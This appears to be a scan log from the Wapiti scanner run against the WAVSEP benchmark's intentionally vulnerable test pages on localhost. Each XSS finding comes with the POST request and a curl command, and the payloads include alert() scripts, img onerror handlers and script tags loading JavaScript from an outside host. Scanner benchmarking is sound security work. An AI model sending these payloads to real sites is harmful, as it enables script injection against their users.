curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wk8mbmd60z%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wd8h0j974t%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wd8h0j974t%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27w8w65rsfak%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w8w65rsfak%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwzcpojgklfz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwzcpojgklfz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw7oi30zhcoz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw7oi30zhcoz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wzp6nu2v4q%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wzp6nu2v4q%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw95nss3qhjz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw95nss3qhjz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wihrqf8130%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wihrqf8130%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwngx0p571lz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwngx0p571lz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wvl93pulj9%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wvl93pulj9%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wcv2a7fsdw%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wcv2a7fsdw%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wo0f8cs1qd%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wo0f8cs1qd%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27w10c4hz6nh%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w10c4hz6nh%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wxmvh4yjs5%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wxmvh4yjs5%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wq0ne245r4%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wq0ne245r4%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wr6s476zgx%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wr6s476zgx%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27ww0tk8zqqt%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27ww0tk8zqqt%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wjt2by86sl%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wjt2by86sl%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cimg%20src%3D.%20onerror%3Dalert%28%22w2dftaxuiq%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cimg%20src%3D.%20onerror%3Dalert%28%22w2dftaxuiq%22%29%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wogqqsz6ew%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wogqqsz6ew%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wugaelmtvg%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wugaelmtvg%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wfzzp3i5jy%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wfzzp3i5jy%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wycz7gewmg%27%29%3C%2Fscript%3E
